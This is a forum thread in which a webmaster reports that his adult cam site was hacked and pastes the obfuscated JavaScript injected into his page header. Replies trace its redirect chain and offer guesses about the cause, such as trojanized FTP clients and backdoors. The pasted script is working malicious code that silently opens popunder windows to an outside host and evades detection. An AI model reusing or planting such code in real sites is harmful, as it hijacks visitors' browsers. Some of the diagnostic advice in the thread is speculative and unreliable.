Damn, Got my site hacked again.

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • lezinterracial
    Confirmed User
    • Jul 2012
    • 3117

    #1

    Damn, Got my site hacked again.

    The site is bestfreecamgirls.com.
    I noticed pop-ups. Using dreamhost shared hosting. Filezilla to access my files.
    Not using wordpress. Using code I wrote myself.

    Should I try vps instead? Something other than filezilla?


    I found this in my header.
    Code:
    <script>function J(K,A){function g(){try{C=Math[(String.fromCharCode(0x66,0154,0x6f,111,114))](document[((function () { var M="e",e="ooki",u="c"; return u+e+M })())][((function () { var n$="t",FK="i",fe="sp",R="l"; return fe+R+FK+n$ })())](f+String.fromCharCode(0x4a,101,0x64,61))['g'.length][(String.fromCharCode(115,112,0x6c,105,0164))](String.fromCharCode(0x3b))[('SGmyvkMN'.length-8)]);} catch(K){};return p<=C||document[((function () { var yc="e",t="i",E="cook"; return E+t+yc })())][(String.fromCharCode(0x69,0156,0144,0x65,0x78,79,102))](f+String.fromCharCode(61))!==-'X'.length;}function I(K,A,b,Y,n,c){if(g())return;var H=String.fromCharCode(0x74,111,0157,0154,0142,97,0162,0x3d,0156,111,0x2c,115,99,0162,0x6f,0154,0154,0142,0x61,114,0x73,0x3d,0x79,0145,0x73,44,0x6c,111,99,97,116,0x69,111,110,0x3d,0171,0145,115,44,0x73,0164,97,0164,0165,0x73,98,0141,114,0x3d,0171,0145,0163,0x2c,109,101,0156,117,98,0x61,0x72,0x3d,110,0x6f,0x2c,0162,0x65,115,105,0172,0x61,98,0154,0x65,0x3d,0x31,054,119,0x69,100,0x74,0150,075)+b[((function () { var X="ing",mV="toStr"; return mV+X })())]()+String.fromCharCode(0x2c,0150,101,0151,0147,104,0164,61)+Y[((function () { var kn="ing",l="oStr",t="t"; return t+l+kn })())]()+String.fromCharCode(0x2c,0x73,99,0x72,101,101,0156,88,61)+n+String.fromCharCode(0x2c,0x73,0x63,0x72,0145,0145,0x6e,0x59,0x3d)+c;document[(String.fromCharCode(111,0156,0143,0x6c,0x69,99,0153))]=function(){if(g())return;window[((function () { var mW="n",v="e",h="op"; return h+v+mW })())](String.fromCharCode(0x6a,97,118,97,0163,99,114,105,0160,0x74,58,0x77,0151,110,0x64,0157,0x77,46,102,111,0x63,0165,0x73,0x28,051,0x3b),String.fromCharCode(0137,0x73,0145,0x6c,0x66),"");m=d[((function () { var gy="ndow",ME="i",Yf="w"; return Yf+ME+gy })())][((function () { var v_="en",hU="p",TY="o"; return TY+hU+v_ })())](K,A,H);if(m){var b=new Date();document[((function () { var Fx="kie",fC="o",q="c",HH="o"; return q+HH+fC+Fx })())]=f+(function () { var k="pires=",Al="1;ex",r="="; return r+Al+k })()+new Date(b[(String.fromCharCode(0x73,101,116,0124,105,0155,0x65))](b[(String.fromCharCode(0x67,0x65,0164,84,105,0x6d,101))]()+z))[(String.fromCharCode(0164,111,0x47,0115,0x54,0x53,0164,114,105,110,103))]()+(function () { var Ww="=/",zk="h",gG=";pat"; return gG+zk+Ww })();b=new Date();document[(String.fromCharCode(0x63,0x6f,0157,0x6b,105,0145))]=f+(function () { var DQ="d=",_="Je"; return _+DQ })()+(C+'x'.length)+String.fromCharCode(59,0145,0170,112,0x69,0x72,0x65,0x73,61)+new Date(b[(String.fromCharCode(0163,0x65,0164,0x54,0x69,0x6d,0145))](b[((function () { var Z="e",ZO="im",dT="getT"; return dT+ZO+Z })())]()+('U'.length*('d'.length*60105+8594)+15901)*(0.0+01750)))[((function () { var Q="ring",B="t",N="toGMTS"; return N+B+Q })())]()+(function () { var S="/",jN="th=",$6=";",u="pa"; return $6+u+jN+S })();O();}};}function O(){try{m[((function () { var N="r",xx="u",Iv="b",Mo="l"; return Iv+Mo+xx+N })())]();m[((function () { var td="r",Oo="pene",o="o"; return o+Oo+td })())][((function () { var v="ow",V="wind"; return V+v })())][(String.fromCharCode(0x66,111,0x63,0165,0x73))]();window[(String.fromCharCode(0163,0145,0x6c,0x66))][(String.fromCharCode(119,0151,110,0x64,0x6f,0167))][(String.fromCharCode(0142,0x6c,0x75,0x72))]();window[(String.fromCharCode(102,0157,0143,0165,0x73))]();if(x[(String.fromCharCode(102,0x69,0162,0145,0146,111,120))])s();if(x[((function () { var k="it",l="webk"; return l+k })())])a();} catch(K){}}function s(){var K=window[(String.fromCharCode(0157,0x70,101,0x6e))](String.fromCharCode(97,98,111,0165,0164,072,0142,108,0141,110,0x6b));K[((function () { var Ho="cus",bc="o",u="f"; return u+bc+Ho })())]();K[((function () { var Mt="se",v="clo"; return v+Mt })())]();}function a(){var K=document[(String.fromCharCode(0143,0x72,101,97,0x74,101,0105,0x6c,0x65,0x6d,101,110,116))](String.fromCharCode(0x61));K[(String.fromCharCode(104,0162,0145,102))]=String.fromCharCode(0141,98,0x6f,0x75,0164,072,98,108,0x61,110,0153);K[(String.fromCharCode(116,97,114,0147,101,0164))]=String.fromCharCode(0150,101,0x6c,0160,101,0162);document[((function () { var ug="Name",Z="ByTag",q="getElements"; return q+Z+ug })())](String.fromCharCode(0x62,111,100,121))[('IKlnTroO'.length-8)][((function () { var _e="d",P="ndChil",R="a",r="ppe"; return R+r+P+_e })())](K);K[((function () { var l="de",zi="t",yl="pa",e="No",L="ren"; return yl+L+zi+e+l })())][(String.fromCharCode(0x72,101,0x6d,0x6f,118,0x65,0103,0x68,0151,0154,0144))](K);var A=document[((function () { var F="t",nj="teEven",G="crea"; return G+nj+F })())](String.fromCharCode(0x4d,0x6f,0x75,115,0145,0105,0166,101,0x6e,0x74,115));A[(String.fromCharCode(105,0x6e,0151,116,0x4d,0x6f,0x75,115,101,0x45,0166,101,0x6e,116))](String.fromCharCode(99,108,105,99,0x6b),true,true,window,('nNuai'.length-5),('xSPTbgOBuf'.length-10),('VmvdiKgmO'.length-9),('QL'.length-2),('qnUVb'.length-5),true,false,false,true,('WqoFhp'.length-6),null);K[(String.fromCharCode(0144,0x69,115,112,0x61,0x74,99,0x68,0x45,118,101,0x6e,0x74))](A);window[(String.fromCharCode(111,0160,101,0156))](K[(String.fromCharCode(104,0x72,101,0x66))],K[(String.fromCharCode(0x74,0x61,0162,0x67,0x65,0164))])[(String.fromCharCode(99,0x6c,0157,0163,0145))]();}var d=top!=window[String.fromCharCode(0163,0x65,0154,0x66)]&&typeof top[(String.fromCharCode(0x64,111,0x63,0x75,0x6d,101,110,116))][(String.fromCharCode(0x6c,0x6f,0143,0x61,0164,105,0x6f,110))][((function () { var Z="g",k="n",_="t",i="oStri"; return _+i+k+Z })())]()===(function () { var r="g",l="i",Wm="st",Wl="n",e="r"; return Wm+e+l+Wl+r })()?top:window[(function () { var N="f",X="l",q="se"; return q+X+N })()];var m=null;A=A||{};var b=A[((function () { var lv="me",W="na"; return W+lv })())]||Math[((function () { var o="or",F="lo",G1="f"; return G1+F+o })())](Math[((function () { var V="om",oE="rand"; return oE+V })())]()*(0.0+01750)+'B'.length);var Y=A[((function () { var h="h",U5="dt",bM="w",ME="i"; return bM+ME+U5+h })())]||window[(String.fromCharCode(111,0x75,0x74,101,0162,0127,0151,0x64,116,104))]||window[(String.fromCharCode(0151,0156,110,0145,0x72,87,105,0x64,116,0x68))];var n=A[(String.fromCharCode(104,0x65,105,0x67,104,0x74))]||window[((function () { var kC="ht",v="Heig",D8="o",QY="uter"; return D8+QY+v+kC })())]-(0x2*050+20)||window[((function () { var HP="ght",L="nerHei",o3="in"; return o3+L+HP })())];var c=typeof A[((function () { var zl="eft",T="l"; return T+zl })())]!=(function () { var D="ed",G="n",pN="u",u="ndefi"; return pN+u+G+D })()?A[(String.fromCharCode(0154,0x65,102,0x74))][((function () { var B="ng",OT="tri",l0="t",AK="oS"; return l0+AK+OT+B })())]():window[(String.fromCharCode(115,0143,0162,0x65,0x65,0156,0130))];var H=typeof A[((function () { var R="p",c6="o",oF="t"; return oF+c6+R })())]!=String.fromCharCode(0165,110,100,0x65,0146,0151,0x6e,0145,0x64)?A[(String.fromCharCode(0164,0157,112))][(String.fromCharCode(0x74,0x6f,0123,116,114,105,110,103))]():window[((function () { var w="nY",q2="e",D7="scr",wm="e"; return D7+wm+q2+w })())];var z=A[(String.fromCharCode(0x77,97,105,0164))]||('eB'.length*03135+342);z=z*(0.0+1000);var p=A[(String.fromCharCode(99,0x61,0160))]||'Os'.length;var C=('TIx'.length-3);var f=String.fromCharCode(0x5f,0x70,0157,0164,0x6f,0163);var x=function(){var K=navigator[(String.fromCharCode(0x75,115,101,114,65,0147,0145,0156,0x74))][(String.fromCharCode(0164,0x6f,0x4c,0x6f,119,101,0162,0103,0141,0163,0145))]();var A={"\x77\145\u0062\x6b\x69\x74":/webkit/[(String.fromCharCode(0x74,0x65,115,0x74))](K),"\x6d\157\172\151\u006c\x6c\u0061":/mozilla/[((function () { var Tg="st",cW="te"; return cW+Tg })())](K)&&!/(compatible|webkit)/[((function () { var y="t",KC="es",P="t"; return P+KC+y })())](K),"\143\x68\x72\x6f\x6d\x65":/chrome/[(String.fromCharCode(0x74,101,0163,0164))](K),"\u006d\u0073\151\145":/msie/[((function () { var ZZ="t",t3="s",m2="t",M="e"; return m2+M+t3+ZZ })())](K)&&!/opera/[(String.fromCharCode(116,0x65,0163,0164))](K),"\u0066\151\x72\x65\146\u006f\170":/firefox/[((function () { var aD="st",x_="e",OU="t"; return OU+x_+aD })())](K),"\u0073\x61\u0066\x61\162\x69":/safari/[(String.fromCharCode(116,0x65,115,0x74))](K)&&!/chrome/[(String.fromCharCode(0x74,0145,0x73,0164))](K),"\x6f\u0070\145\x72\x61":/opera/[(String.fromCharCode(0164,0145,0x73,0x74))](K),"\x6d\x6f\x62\151\u006c\145":/mobile|ip(hone|od|ad)|android|blackberry|iemobile|kindle|netfront|silk-accelerated|(hpw|web)os|fennec|minimo|opera m(obi|ini)|blazer|dolfin|dolphin|skyfire|zune/[((function () { var uz="t",L5="tes"; return L5+uz })())](K)};A[(String.fromCharCode(0x76,101,0x72,0x73,0151,0x6f,0x6e))]=A[((function () { var Ko="ri",ff="safa"; return ff+Ko })())]?(K[((function () { var LQ="h",S="tc",Pv="m",U="a"; return Pv+U+S+LQ })())](/.+(?:ri)[\/: ]([\d.]+)/)||[])['E'.length]:(K[(String.fromCharCode(0x6d,0x61,0164,99,0x68))](/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/)||[])['Q'.length];return A;}();I(K,b,Y,n,c,H);};J((function () { var j="e56015a/",$="d0aa122e96ef6453",m="http://wooga.inf",t="o/GpzD/89e"; return m+t+$+j })(),{"\x6e\u0061\u006d\145":String.fromCharCode(112,0x6f,0x70),"\167\x69\144\u0074\u0068":window[(function () { var F="en",d="scre"; return d+F })()][((function () { var N="h",Q="d",a="w",f="t",V="i"; return a+V+Q+f+N })())],"\u0068\145\151\147\x68\x74":window[(function () { var _="een",c="scr"; return c+_ })()][((function () { var qu="t",I="h",G="heig"; return G+I+qu })())],"\u0074\u006f\x70":('iCFu'.length-4),"\154\u0065\x66\164":('LvhX'.length-4),"\x77\u0061\x69\x74":'TWdBLeF'.length*(1*026+2)*(3*021+9)*(1*0x23+25),"\143\x61\u0070":'u'.length}); // menu_potos</script>
            <meta name="prVerify" content="fa9bbfa833cadb34065b654dc3914ec8" />
    	<link rel="stylesheet" type="text/css" href="style.css" media="screen">
    Live Sex Shows
  • InfoGuy
    80/20 Rule
    • Apr 2010
    • 3052

    #2
    Originally posted by lezinterracial
    The site is bestfreecamgirls.com.
    I noticed pop-ups. Using dreamhost shared hosting. Filezilla to access my files.
    Not using wordpress. Using code I wrote myself.

    Should I try vps instead? Something other than filezilla?

    I found this in my header.
    What was the popup promoting?

    Have you scanned your PC for malware?

    Do you use the same password elsewhere?

    Have you changed your password to something longer and more complex with lowercase letters, uppercase letters, numbers & special characters? To brute force just an 8-character password utilizing all 4 types (assuming 90+ characters) would require trying over 4 quadrillion (4.30467E+15) potential combinations.
    Support American Heroes | How Bad is My Batch? | Vaccine Deaths & Adverse Reactions | Free Speech Coalition | <WARNING> ePayService / Guerra Capital, INC / MTACC payments | Flirt4Free Fucks their Affiliates | Don't do business with piece of shit Andy Alvarez from Webmaster Central / VR3000, who said:
    "If it was up to me, they would have shot all 30,000 of those country loving shitheads"

    Comment

    • lezinterracial
      Confirmed User
      • Jul 2012
      • 3117

      #3
      Originally posted by InfoGuy
      What was the popup promoting?
      Different things. Mainly cheating cougars.
      First link I see is wooga.info/GpzD/89ed0aa122e96ef6453e56015a/


      Have you scanned your PC for malware?
      not yet.

      Do you use the same password elsewhere?
      no



      Have you changed your password to something longer and more complex with lowercase letters, uppercase letters, numbers & special characters? To brute force just an 8-character password utilizing all 4 types (assuming 90+ characters) would require trying over 4 quadrillion (4.30467E+15) potential combinations.
      at least 13, upper and lower case, special characters and numbers.


      Here is where it happened before.
      http://gfy.com/fucking-around-and-pr...ript-site.html
      Live Sex Shows

      Comment

      • lezinterracial
        Confirmed User
        • Jul 2012
        • 3117

        #4
        The script only effected index.php. stat command only shows when the file was last changed. But I already changed it. Looking on google cache, I know the script was on my site on 6/15.
        Live Sex Shows

        Comment

        • lezinterracial
          Confirmed User
          • Jul 2012
          • 3117

          #5
          I moved my site to a VPS. Hope this helps. I am hoping it was a flawed site on my shared server and not my site.


          Just in case you were curious.

          Redirect detective shows the following.
          wooga.info/GpzD/89ed0aa122e96ef6453e56015a/

          wmtracer.cn.com/?a=85&c=1692&s1=9248&s2=bf3393854b9dbd1acdec287f09 59ca3d5b41d3c3&s3=2798

          yqzjk.imideals.com/c/2332b00a20149287?s1=4816&s2=1222&s5=85&click_id=27 25433

          milfalone.com/c/e4a0440f73f4cca4?s1=4816&s2=1222&s3=&s5=85

          affiliate.thedatingnetwork.com/tracking/click/v1?site=instanthookups.com&afn=791552&afnPromoCode =1&keyword=4816_1222&tour=bigselector

          instanthookups.com/dating/bigselector/791574/4816_1222/hash%3D40-1ed84a24be68adbbe1ab46d930913d34%26pixel%3D11690

          instanthookups.com/dating/bigselector/791574/4816_1222/hash%3D40-1ed84a24be68adbbe1ab46d930913d34%26pixel%3D11690

          instanthookups.com/dating/bigselector
          Live Sex Shows

          Comment

          • porncrash
            Confirmed User
            • Mar 2017
            • 59

            #6
            I don't really think this was because of shared hosting.

            If I have some free minutes, I could check your site against some high-risk security issues, ofc only if you want me to do that.


            regards

            Comment

            • lezinterracial
              Confirmed User
              • Jul 2012
              • 3117

              #7
              Originally posted by porncrash
              I don't really think this was because of shared hosting.

              If I have some free minutes, I could check your site against some high-risk security issues, ofc only if you want me to do that.


              regards
              I am cool with that.
              Live Sex Shows

              Comment

              • Miguel T
                ♦ Web Developer ♦
                • May 2005
                • 12473

                #8
                You probably have a backdoor somewhere, changing hosts will not solve it mate .

                Full Stack Webdeveloper: HTML5/CSS3, jQuery, AJAX, ElevatedX, NATS, MechBunny, Wordpress

                Comment

                • Sarn
                  WW3
                  • Sep 2015
                  • 12405

                  #9
                  Not post links here, you will infect users who click them.
                  What about say log files?
                  ----

                  Comment

                  • 8pt-buck
                    So Fucking Banned
                    • Aug 2013
                    • 4011

                    #10
                    Hope the malicious version of that page was not cached.

                    Comment

                    • romeo22
                      你自己去他媽的
                      • Mar 2008
                      • 23350

                      #11
                      You cant trust anyone nowadays

                      Comment

                      • Beaver1
                        Confirmed User
                        • Dec 2002
                        • 651

                        #12
                        Your problem is Filezilla !

                        Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there.
                        These reload toons of trojans to your local machine and
                        submit all your ftp passwords to the intruders.

                        Hit the format c: button
                        after closing the ftp on your servers.

                        Best Regards
                        Buy and Sell Cam, Dating, Gaming, Gambling and Mainstream Pop-ups: Pop Ads

                        Comment

                        • ctggls
                          Confirmed User
                          • Aug 2012
                          • 898

                          #13
                          Originally posted by Beaver1
                          Your problem is Filezilla !

                          Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there.
                          These reload toons of trojans to your local machine and
                          submit all your ftp passwords to the intruders.

                          Hit the format c: button
                          after closing the ftp on your servers.

                          Best Regards
                          Nice one! Did not knew about hacked copies of filezilla. Guess I should upgrade to the laste version from their official site...

                          Comment

                          • lock
                            Confirmed User
                            • Jul 2003
                            • 5065

                            #14
                            Originally posted by Beaver1
                            Your problem is Filezilla !

                            Google Maleware Filezilla since 2013 are a lot Injected Download Mirrors out there.
                            These reload toons of trojans to your local machine and
                            submit all your ftp passwords to the intruders.

                            Hit the format c: button
                            after closing the ftp on your servers.

                            Best Regards
                            I used it to build a few sites that got hacked 24 hours later. I modified a bunch of things with it and everything I touched was trashed I never actually realized it was filezilla. I usually use other FTPs but wanted one feature to do one thing and kept using it a while. Only realizing now thanks to Beaver what actually happened.
                            Traffic.Tools - 40+ Free Tools
                            Free.Marketing - 150+ Free Tools
                            Submission.Tools
                            - 20+ Free Tools

                            Comment

                            • Her-Sson
                              Confirmed User
                              • Nov 2016
                              • 147

                              #15
                              Damm Putin.

                              Comment

                              • nico-t
                                emperor of my world
                                • Aug 2004
                                • 29903

                                #16
                                Good luck.

                                Some fucking retard is trying to reset the passwords on my wordpress sites. What's the point of that?

                                Comment

                                Working...